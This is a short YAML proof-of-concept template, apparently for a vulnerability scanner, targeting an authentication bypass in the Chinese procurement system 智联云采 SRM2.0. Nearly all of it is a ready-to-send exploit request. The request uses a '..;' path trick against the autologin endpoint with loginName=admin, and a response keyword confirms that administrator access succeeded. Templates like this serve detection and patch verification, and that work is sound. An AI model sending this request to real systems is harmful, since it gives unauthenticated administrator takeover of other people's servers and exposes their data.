30 lines
1.2 KiB
YAML
30 lines
1.2 KiB
YAML
keyword: SRM2.0
|
|
name: 智联云采SRM2.0身份认证绕过漏洞
|
|
description: | # 下一行可填写漏洞描述
|
|
智联云采SRM2.0系统接口autologin身份认证绕过漏洞
|
|
requests: # 为空代表默认或者不启用
|
|
path: "/adpweb/static/..;/api/sys/app/autologin?loginName=admin"
|
|
method: GET
|
|
headers:
|
|
Accept: '*/*'
|
|
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/603.3.8 (KHTML, like Gecko) Version/10.1.2 Safari/603.3.8
|
|
Referer: https://www.baidu.com
|
|
Accept-Encoding: gzip, deflate
|
|
Connection: keep-alive
|
|
body-raw: |- # 如果需要发送请求体,在下一行开始填写
|
|
|
|
|
|
response:
|
|
path: "" # 不填则默认接收此请求的响应包
|
|
status-code: 200
|
|
body: "管理工作台" # 此处可填写响应体中确认漏洞存在的关键字或者其他信息
|
|
time: # 此处填写响应包响应时间,默认不启用
|
|
headers:
|
|
Server:
|
|
Content-type:
|
|
Content-length:
|
|
Date:
|
|
Connection:
|
|
impact: | # 下一行可填写漏洞影响
|
|
由于智联云采 SRM2.0 autologin 接口代码逻辑存在缺陷,导致未授权的攻击者可以构造特殊绕过身份认证直接以管理员身份接管后台,造成信息泄露,使系统处于极不安全的状态。
|